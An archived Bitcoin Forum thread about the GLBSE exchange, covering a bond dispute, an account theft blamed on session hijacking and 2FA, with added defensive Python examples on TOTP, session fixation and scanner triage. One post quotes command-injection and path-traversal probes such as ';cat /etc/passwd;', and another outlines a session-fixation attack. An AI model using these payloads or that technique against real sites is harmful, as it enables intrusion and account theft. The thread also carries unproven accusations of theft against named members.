Bitcoin Forum
Author Topic: GLBSE 2.0 open for testing  (Read 51712 times)
Nefario (OP), August 29, 2012, 01:32:34 PM, #581

Quote
He told me that as well - but that was around Friday the 17th...

Of course, that has always been his position until he had to pay.

Quote
Obviously later he realized that you and your goats are going to screw the little people over, using the BS&T liquidation as an excuse.

I don't see your reasoning. AFAIK all PPTs have been explicit: funds are repaid when Pirate pays, not repaid if he defaults. The exceptions to this were the insured PPTs, which have already paid out insurance in at least 2 instances (Goat and DeadTerra).

I couldn't hand over the information if I wanted to (which I don't), as the Data Protection Act prevents me from doing so (see here and here for information on the Data Protection Act, to which I am subject).

Also, how is it me and Goat screwing over the little people? What do we profit from this?

All I've done is create a platform and allowed people to use it.
All Goat has done is everything he said he would.

People knew what they were "invested" in and the risk was theirs. Are you saying people should not be responsible for their own decisions?

Quote
So IMO he's played it very well. And now you are fucking screwed Nefario, together with your fucking goat.

Lol, fucked a goat. But seriously, since I disagreed with you on the details (accusations, you know; I used facts, which you seemed immune to) of your crusade against Goat (who I don't have much love for, BTW) you've had it in for me.

Quote
If anyone is going to trust you again, these will be only stupid people with no money.
I warned you that Goat was going to pull you down, to the very bottom where he already was - you should have believed me.

What are you talking about? Pull me down? All the way down to Chinatown? Really bro, get a grip.

PGP key id at pgp.mit.edu 0xA68F4B7C

To get help and support for GLBSE please email support@glbse.com
btharper, August 29, 2012, 10:30:50 PM, #582

Quote from Nefario
Really bro get a grip.

Hearing this from you, Nefario, amuses me to no end; you're normally extremely well-spoken.

And @piotr_n, seriously man? What the hell? You can't be reasoned with, you won't see fact. You thought something looked shady (and I agree it did); it was explained, but you're still stuck on it. Who you agreed (before he disagreed with you) would be able to settle things.

Quote
Second that troll is a troll. He is on my ignore list... I have been buying these bonds at a good discount. I currently have bids in. This guy is just a troll with FUD.
You have no honor whatsoever, you fucking liar.

GLBSE API don't lie.
But if it is not enough for you, we can always ask Nefario to check if you have sold any TYGRR.BOND-P since Pirate announced the close down.
Because if you haven't - it means GLBSE's API is broken...
So, should I file the bug report? :)

Yeah, ask Nefario. I did not sell any P bonds, however I did buy...

Once you ask I expect an apology...
OK!

But it didn't go your way and now you're bitching in every avenue you can find about how everyone who has disagreed with you is wrong and obviously all lying to screw everyone else.

So might I extend a polite "Fuck off and don't come back" to you?
Nefario (OP), August 30, 2012, 12:54:02 PM, #583

Quote from btharper
Hearing this from you Nefario amuses me to no end, you're normally extremely well-spoken.

Sorry, I'm just getting really tired of people attacking me or GLBSE; they don't have anything to actually criticize, so they make stuff up and throw all kinds of baseless accusations.

There is piotr_n, as you see, but also MPOE-PR (Mircea Popescu of Romania's sock puppet), who lately has been saying that I'm being sued as part of the Bitcoinica lawsuit (says I'm one of the unnamed Does). The guy is making up all kinds of stuff, and attacking me when I'm on IRC.

ZodiacDragon84, August 30, 2012, 12:59:43 PM, #584

You have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

Gladamas, August 30, 2012, 06:06:39 PM, #585

Quote from ZodiacDragon84
You have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.

piotr_n (aka tonikt), August 30, 2012, 06:12:08 PM, #586

Quote from ZodiacDragon84
You have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

Quote from Gladamas
+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.

Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate? :)

mila, August 30, 2012, 06:18:33 PM, #587

That's the spirit!

Quote from piotr_n
...
I will suggest at the end that maybe it was a bug that Nefario should investigate? :)

Bugs should be investigated ;)

nedbert9, August 30, 2012, 07:27:20 PM (last edit: August 30, 2012, 08:23:51 PM by nedbert9), #588

Quote from piotr_n (post #586 above)
Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate? :)

Ok.

I am the victim of the ASICMINER theft. My nature is not to sling sh*t around - particularly when a hacker gets in and no one can definitively point out the method used for the hack.

Also, GLBSE is a great enabler of Bitcoin denominated economic activity. Props to Nefario for that.

I am only responding on this topic because I see that someone feels just like I do. Someone takes a loss of thousands of dollars and no one cares to do anything about it if it would only cost ~30 BTC to revert.

With that said, I'm super pissed. Yes, I'm super pissed at GLBSE. I am also pissed at myself for not doing the right thing and taking pro-active measures to prevent account compromise by enabling 2FA for login, transfers and withdrawals. You are not protected from session attacks if you don't enable 2FA for every single GLBSE activity. Do it.

Since the compromise of my GLBSE account I have set up all sorts of IP logging activity just to review and verify that I'm not on a botnet or compromised by a trojan of any sort.
My system is quiet. Nothing unusual.

3000 shares of ASICMINER asset were transferred to me on 8/23. An hour later I logged in to web freenode #bitcoin-otc. I cannot say for certain whether I manually killed my GLBSE session. I do know that no browser window was open to GLBSE. I remained logged in to #bitcoin-otc for a few hours. Later in the evening people were posting of a dump of ASICMINER asset. I logged in to my GLBSE account to find the asset liquidated for ~1% of its value.

Absolutely nothing occurred on that day out of the ordinary other than visiting freenode. I have relatively few apps on the system and fewer running at any one time. I am not a security expert, but I take precautions and I've never been infected in any obvious way or by report of antivirus or by any insane amount of TCP activity.

So, what I had suspected, and with Nefario also pointing out the same possibility, is that I was a victim of Session Fixation. Someone hijacked my GLBSE session.

Nefario's position on this is that attacks of this nature, Session Fixation, are not the responsibility of GLBSE, but admitting at the same time that additional security precautions could be taken on the GLBSE web application side that could make it more difficult to accomplish session related attacks.

At this point I did two things. Looked up Web security whitepapers. Found one stating "Session Fixation, ultimately, can only effectively be countered by the Web application (which would include the client side scripting) in how it controls session generation and invalidation." Ok, fine. At this point I'm thinking: if I close my browser window, what happens to my GLBSE session? If my session was hijacked that would have been the obvious way to get in. Opened up my Chrome console and looked at the session IDs. Session IDs persisted across browser windows with a 48 hour browser side expiration period. Of course, there could be a shorter session expiration period on the web app side.

Edit:
A few thoughts occurred to me.

Why isn't Javascript used to invalidate sessions when the DOM for the page is destroyed?
Why aren't sessions invalidated on a client side timer, as on most banking sites?
Why isn't 2FA a requirement for every single GLBSE activity?

I think you can see the premise of my questions. I do believe GLBSE is partially responsible for my loss.

I'm angry because it's entirely too easy to commit fraud and get away with it in a system of Bitcoin and GLBSE that allows or enforces anonymity and instantaneous transfers.
The feeling I got from the incident is one of "use at your own risk."

cuz0882, August 30, 2012, 08:16:45 PM, #589

I've been thinking it would be a great security feature if you put a 24 hour delay on the creation of assets. That or something similar to protect assets if there is a hacked account.
Namworld, August 30, 2012, 08:39:03 PM, #590

Quote from piotr_n (post #586 above)
Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
[...]
Not to mention reverting the transaction - c'mon, how hard would that be?

Well first, to reverse a transaction, Nefario would need to be able to verify that the person didn't willingly liquidate the asset and is having second thoughts, something that may be hard if no compromise was detected and the account's session got hijacked or its login leaked by a keylogger. Just like a real stock market, you don't go around requiring your transactions to be reversed; all transactions are final.

Quote from nedbert9 (post #588 above)
[...]
Two thoughts occurred to me.

Why isn't Javascript used to invalidate sessions when the DOM for the page is destroyed?
Why isn't 2FA a requirement for every single GLBSE activity?

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.

The main purpose being that if someone hijacks your session or keylogs your computer, that person cannot simply log in/make transactions, since the person would also need access to the external device, which is almost impossible except in person for your smartphone.

Quote from nedbert9
I'm angry because it's entirely too easy to commit fraud and get away with it in a system of Bitcoin and GLBSE that allows or enforces anonymity and instantaneous transfers.
The feeling I got from the incident is one of "use at your own risk."

Let's quote the user terms:
Quote
5. The Users of the Exchange take full responsibility for their own actions, and any consequences resulting from those actions. It is the Users' own responsibility to determine the risks involved in depositing funds with the Exchange, creating assets, executing trades, or any other activity or action related to the use of the Exchange, or any of its current services.
6. The Exchange is currently beta release software, and as such the Exchange assumes no responsibility or liability for any losses that may be incurred if the Exchange is taken offline to deal with any problems that may arise. The Exchange makes no guarantees as to the correct functioning of its services until it is removed from beta release, although the Exchange will do its best to ensure it is functioning correctly. The Users use the Exchange at their own risk.

People started using GLBSE while Nefario was still developing and testing it in version 1.0

It is still not out of beta however.

Since then he's been working overtime to polish features, secure it and develop it further as fast as he could. Now I don't know how well secured the platform is, but so far, all account thefts reported were linked to accounts without 2 factor authentication, for which the login info was most likely leaked. I don't know how he prevents any session related security issues, but it remains that:
- any session can always be taken over no matter the security measures if the person has access to your session ID + IP.
- any account can be accessed if your login info were keylogged.

Hence the need for 2 factor auth to prevent withdrawals/logins.
nedbert9, August 30, 2012, 08:44:11 PM, #591


Quote from Namworld
2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.

This is false. JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.

The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.

This gives the wrong impression, just like both you and I had about 2FA. I didn't turn on 2FA on GLBSE because I don't have a smart phone.

Terms of Service doesn't mean someone isn't negligent. It's just that they might not be legally responsible for being negligent.
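The "Google 2FA framework" that nedbert9 and Namworld are discussing is TOTP (RFC 6238): a shared secret, the number of the current 30-second window, and an HMAC. Nothing in it depends on a phone, which is why JAuth on a desktop produces the same codes as the Google Authenticator app. The following is an added example, not GLBSE's code and not code from any poster in this thread: it implements code generation and the server-side check in Python, including the replay guard an exchange would need so that a code sniffed or keylogged inside its 30-second window cannot be reused. The secret is the RFC 6238 test key so the outputs can be checked against the RFC's reference table; the account name "alice" and issuer "GLBSE" in the provisioning URI are illustrative assumptions.

```python
import base64
import hashlib
import hmac
import struct
import time

# Added example; not GLBSE's own code. The secret is the RFC 6238 test key, used here
# so the outputs can be compared with the RFC's reference table.
TEST_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226: HMAC(secret, counter as 8-byte big-endian) -> dynamic truncation -> decimal."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 6238: HOTP whose counter is the number of whole `step`-second windows since the epoch."""
    return hotp(secret, at // step, digits, algo)


def verify_totp(secret: bytes, code: str, at: int, last_counter: int = -1,
                step: int = 30, digits: int = 6, window: int = 1):
    """Server-side check. Accepts the current window and +/- `window` neighbours (clock skew),
    compares in constant time, and refuses any counter at or below `last_counter`, the
    counter of the last code this account successfully used. That rule is what stops an
    attacker who captured a code from replaying it inside the same window.
    Returns the accepted counter (store it as the new last_counter) or None."""
    now = at // step
    for drift in range(-window, window + 1):
        counter = now + drift
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter, digits), code):
            return counter
    return None


def provisioning_uri(secret: bytes, account: str, issuer: str) -> str:
    """otpauth:// URI in the key-URI format that Google Authenticator and compatible apps
    import from a QR code. The base32 secret is the only thing that leaves the server."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return f"otpauth://totp/{issuer}:{account}?secret={b32}&issuer={issuer}&digits=6&period=30"


if __name__ == "__main__":
    # Illustrative account name and issuer (assumptions, not GLBSE's real values).
    print(provisioning_uri(TEST_SECRET, "alice", "GLBSE"))
    print("code now:", totp(TEST_SECRET, int(time.time())))
```

The part Namworld is right about is not the device but the isolation: the secret must live somewhere the keylogged machine cannot read, so a desktop client on the same box as the browser defends against a stolen password and a hijacked session, but not against malware on that box. The server should also rate-limit failed checks, since six digits is only a million guesses per window.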
bitcoinbear, August 30, 2012, 08:50:04 PM, #592


Quote from nedbert9 (post #591 above)
[...]

Does anybody have a quick link to info on the 2FA?

Namworld, August 30, 2012, 09:10:15 PM, #593

Quote from nedbert9 (post #591 above)
[...]

True, you can use it on a computer too, but it SHOULD be an external computer, not the computer you use to login. Which also requires an external device such as an extra computer, or smartphone. Otherwise someone with a compromised computer can still get your account stolen easily. The 2 factor auth needs to be on another device to effectively block infected/keylogged computers from stealing an account. There's no instructions as to how to use it, but there ARE links to the Google Authenticator app along with the name written in big at the top of the page. You can simply click one of those links or go read about it. There's more than enough instructions on Google's website about it.

And yes, I'm not saying it couldn't be negligence. I'm saying that people started using a service which was NOT finished and Nefario still doesn't claim it to be a finished product, although he's been working quickly since 1.0 when he noticed someone had created an asset for real use. The product never got out of Beta however. However it does seem secure so far.

If you weren't doing anything else than using GLBSE and IRC, and never clicked any link in IRC, my best guess would be that someone had your login info or a compromised account.

If it was a session hijack, then GLBSE's security could be improved to deter this.

The easiest attack would probably be if GLBSE accepts the session ID to be set externally and you click a shortened URL which leads to a page with a redirect script. The redirect leads to an actual legit page. The page containing the redirect first records an ID and opens GLBSE in a frame, setting the session ID to said ID. Everyone that clicked on the link sees a legit page loading but now has a new session identifier set for GLBSE. The attacker can now try accessing GLBSE with each generated ID and, if it is associated with someone already logged in to GLBSE, he can get access to the account. Although I'd be very surprised that GLBSE accepts the session ID to be set/changed through a link, it would be a major security risk. Many things could be done to prevent session based attacks if not already done.

Quote from bitcoinbear
Does anybody have a quick link to info on the 2FA?

http://support.google.com/a/bin/answer.py?hl=en&answer=1037451
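nedbert9 (post #588) and Namworld (just above) describe the same mechanism from opposite ends: one saw a session id that outlived the browser window with a 48-hour cookie lifetime, the other spells out how an id planted through a framed link becomes a logged-in session if the site keeps whatever id it was handed at login. The example below is added here; it is not GLBSE's code nor code from either poster. It models a server-side session table in Python with the fixable login beside the fixed one, server-enforced idle and absolute timeouts, and a step-up second-factor check on transfers, then replays Namworld's attack against both logins. The timeout values, the account name "victim" and the attack simulation are assumptions for illustration.

```python
import secrets

# Added example, not GLBSE's code. Timeouts are assumed policy values for illustration.
IDLE_TIMEOUT = 15 * 60        # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # seconds after login before re-authentication is forced
MFA_MAX_AGE = 5 * 60          # how recently a second factor must have been shown for a transfer


class SessionStore:
    """Server-side session table. The browser holds only the opaque id; user, timestamps
    and 2FA status live here, so expiry is decided by the server, not by the client's clock
    or its page script (which an attacker's browser never runs)."""

    def __init__(self):
        self.sessions = {}

    def _new_record(self, now, user):
        return {"user": user, "created": now, "last_seen": now, "mfa_at": None}

    def create(self, now, user=None):
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: not guessable
        self.sessions[sid] = self._new_record(now, user)
        return sid

    def get(self, sid, now):
        """Live session or None; idle and absolute limits are checked on every access."""
        sess = self.sessions.get(sid)
        if sess is None:
            return None
        if now - sess["last_seen"] > IDLE_TIMEOUT or now - sess["created"] > ABSOLUTE_TIMEOUT:
            self.destroy(sid)
            return None
        sess["last_seen"] = now
        return sess

    def destroy(self, sid):
        self.sessions.pop(sid, None)


def login_vulnerable(store, client_sid, user, now):
    """Fixation bug: whatever id the client presented (cookie, URL parameter, a framed
    request) is kept and simply marked authenticated. An id planted in the victim's
    browser before login therefore becomes a logged-in session for whoever planted it."""
    sess = store.sessions.setdefault(client_sid, store._new_record(now, None))
    sess["user"] = user
    sess["last_seen"] = now
    return client_sid


def login_hardened(store, client_sid, user, now):
    """Fix: after the credential check, drop the pre-authentication session and mint a
    fresh random id. A planted id is never upgraded, so the attacker holds a dead session."""
    store.destroy(client_sid)
    return store.create(now, user=user)


def whoami(store, sid, now):
    sess = store.get(sid, now)
    return sess["user"] if sess else None


def transfer(store, sid, now, totp_ok):
    """Step-up for an asset transfer or withdrawal: a live, authenticated session AND a
    second factor presented within MFA_MAX_AGE. A hijacked session alone cannot move assets."""
    sess = store.get(sid, now)
    if sess is None or sess["user"] is None:
        return False
    if totp_ok:
        sess["mfa_at"] = now
    return sess["mfa_at"] is not None and now - sess["mfa_at"] <= MFA_MAX_AGE


def fixation_attack(login):
    """Replays the attack described in the thread: the attacker obtains a pre-auth id from
    the site and plants it in the victim's browser (framed page); the victim then logs in
    while carrying that id; the attacker presents the same id. Returns the account the
    attacker lands in (None means the attack failed)."""
    store = SessionStore()
    t0 = 1_000_000
    planted = store.create(t0)                    # attacker's pre-auth session id
    login(store, planted, "victim", t0 + 60)      # victim authenticates carrying the planted id
    return whoami(store, planted, t0 + 120)       # attacker tries the id they planted


if __name__ == "__main__":
    print("vulnerable login, attacker sees:", fixation_attack(login_vulnerable))   # victim
    print("hardened login, attacker sees: ", fixation_attack(login_hardened))     # None
```

Two things follow for the questions raised in the thread. Invalidating the session from JavaScript when the page is torn down does nothing against a hijacker, because the code runs in the victim's browser and the attacker's copy of the id is used from another one; only the server-side idle and absolute limits above actually retire an id. And the 48-hour cookie lifetime nedbert9 observed is harmless only if the server enforces shorter limits of its own; the cookie should additionally be marked Secure and HttpOnly, and the id must never be accepted from a URL parameter.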
muyuu, August 30, 2012, 10:31:07 PM, #594

Are graphs not working?

arsenische, August 31, 2012, 10:32:29 PM (last edit: August 31, 2012, 11:32:50 PM by arsenische), #595

I received strange messages in my GLBSE mailbox:

From     To            Time              Subject
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:24 Fri-31/Aug   '"()
asdzxc   arsenische    18:24 Fri-31/Aug   {"$acunetix"=>"1"}
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:23 Fri-31/Aug   http://testasp.vulnweb.com/t/fit.txt?%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   1some_inexistent_file_with_long_name%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   ${100036+99616}
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
...
asdzxc   arsenische    19:03 Fri-31/Aug   "|dir
asdzxc   arsenische    19:03 Fri-31/Aug   '&dir&'
asdzxc   arsenische    19:03 Fri-31/Aug   '|dir
asdzxc   arsenische    19:03 Fri-31/Aug   |dir
asdzxc   arsenische    19:03 Fri-31/Aug   "&dir&"
asdzxc   arsenische    19:03 Fri-31/Aug   ";cat /etc/passwd;"
asdzxc   arsenische    19:03 Fri-31/Aug   &dir
asdzxc   arsenische    19:03 Fri-31/Aug   ||cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   ';cat /etc/passwd;'
asdzxc   arsenische    19:03 Fri-31/Aug   |cat /etc/passwd#
asdzxc   arsenische    19:03 Fri-31/Aug   "|"ld
asdzxc   arsenische    19:03 Fri-31/Aug   '|'ld
asdzxc   arsenische    19:03 Fri-31/Aug   `cat /etc/passwd`
asdzxc   arsenische    19:03 Fri-31/Aug   ;cat /etc/passwd;
asdzxc   arsenische    19:03 Fri-31/Aug    cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   &cat /etc/passwd&
asdzxc   arsenische    19:03 Fri-31/Aug   '&cat /etc/passwd&'
asdzxc   arsenische    19:03 Fri-31/Aug   "&cat /etc/passwd&"
asdzxc   arsenische    19:02 Fri-31/Aug   /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
asdzxc   arsenische    19:02 Fri-31/Aug   ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-- is everything ok?
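The subjects arsenische lists are the stock probe strings of an automated web vulnerability scanner, fed through the user-to-user message form so that every recipient's inbox shows them: the "injected_by_wvs" and "$acunetix" markers and the vulnweb.com test host are Acunetix's own, the rest are generic command-injection, path-traversal, null-byte, header-injection and expression-evaluation payloads. The {"$acunetix"=>"1"} subject is how Ruby prints a hash, which suggests the form echoed a nested parameter back unchanged. The Python below is an added example, not GLBSE's code: it tags each subject by attack class and flags a sender whose burst spans several classes, which is the triage a support mailbox or a message-form abuse filter would do before answering or banning. The sample rows are copied from the post; the "alice" row is a constructed benign control.

```python
import re
from collections import Counter, defaultdict

# Added example, not GLBSE's code. Subjects are copied from the messages quoted in the
# post; the "alice" line is a constructed benign control.
SAMPLE = [
    ("asdzxc", "1"),
    ("asdzxc", "SomeCustomInjectedHeader:injected_by_wvs"),
    ("asdzxc", "'\"()"),
    ("asdzxc", '{"$acunetix"=>"1"}'),
    ("asdzxc", "http://testasp.vulnweb.com/t/fit.txt?%00.jpg"),
    ("asdzxc", "1some_inexistent_file_with_long_name%00.jpg"),
    ("asdzxc", "${100036+99616}"),
    ("asdzxc", "'|dir"),
    ("asdzxc", "\";cat /etc/passwd;\""),
    ("asdzxc", "`cat /etc/passwd`"),
    ("asdzxc", "\"|\"ld"),
    ("asdzxc", "../..//../..//../..//windows/win.ini"),
    ("asdzxc", "/.\\./.\\./.\\./windows/win.ini"),
    ("alice", "dividend question"),
]

# Ordered so the most specific tag comes first; one payload may carry several tags.
RULES = [
    ("scanner-fingerprint",  re.compile(r"acunetix|injected_by_wvs|vulnweb\.com|\.acu\b", re.I)),
    ("header-injection",     re.compile(r"^\s*[A-Za-z][\w-]*:(?!//)")),   # "Name: value", not a URL scheme
    ("command-injection",    re.compile(r"(?:^|[;&|`'\"])\s*(?:cat\s+/etc/passwd|dir|ld)\b")),
    ("path-traversal",       re.compile(r"\.\./|\.\\+\./|win\.ini", re.I)),
    ("null-byte",            re.compile(r"%00")),                          # truncate an extension check
    ("expression-injection", re.compile(r"\$\{[^}]*\}")),                  # ${a+b}: is it evaluated?
    ("syntax-probe",         re.compile(r"^['\"()]+$")),                   # bare quotes to provoke an error
]


def classify(payload: str) -> list:
    """Tags for one submitted value; ["unclassified"] when nothing matched."""
    tags = [name for name, rx in RULES if rx.search(payload)]
    return tags or ["unclassified"]


def triage(messages):
    """Per-sender histogram of attack classes over (sender, subject) pairs."""
    by_sender = defaultdict(Counter)
    for sender, subject in messages:
        for tag in classify(subject):
            by_sender[sender][tag] += 1
    return by_sender


def is_scanner(counter: Counter, min_distinct: int = 3) -> bool:
    """One sender exercising several unrelated attack classes in a burst is an automated
    scan, not a confused user: treat the account as hostile rather than answer its mail."""
    return sum(1 for tag in counter if tag != "unclassified") >= min_distinct


if __name__ == "__main__":
    for sender, counts in triage(SAMPLE).items():
        print(sender, "scanner" if is_scanner(counts) else "ok", dict(counts))
```

The classification is for triage, not for blocking on its own: the useful signal is the breadth of classes from one account in a few minutes, which is why `is_scanner` counts distinct tags rather than matches. What the scan actually tells the operator is whether any of those subjects came back rendered or executed rather than escaped; every one of them should appear in a recipient's inbox exactly as typed, as they did here.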

Namworld, August 31, 2012, 11:43:59 PM, #596

Looks like someone is trying to hack GLBSE by using the mailing form =/

Don't think it will work tho.
DiabloD3, September 01, 2012, 03:07:48 AM, #597

Quote from arsenische (post #595 above)
[...]
-- is everything ok?

I got the same crap too from the same user.

232 new messages.

Nefario, do me a favor and fix my inbox.

btharper, September 01, 2012, 04:11:32 AM, #598

I would be very disappointed if that crap worked on GLBSE, I'm glad to see no one posted anything but annoyance at the spam. (Also, maybe there's a use for a "Report spam" Button?)

There are definitely things that can be done to improve security, but as with any patch Nefario has to be careful to make sure any patch he applies doesn't introduce a security vulnerability, even if it's a security patch. During/after that he has to make sure that the site remains functional; a patch that helps keep other people from hijacking your session may make it harder for you to use your session, which would certainly annoy a great many users.

I'm sure he's hard at work on something, though I can't say for sure what (It may still be features other than security enhancements, there are plenty of people yelling for those too)
DiabloD3, September 01, 2012, 08:16:28 PM, #599

Nefario seems to be very busy in real life and is out of his country, so he might not be heard from for a few days.

Namworld, September 01, 2012, 09:35:19 PM, #600

He was visiting his wife's family in China. I'm not sure when he's going back home. I believe within the next 2 weeks.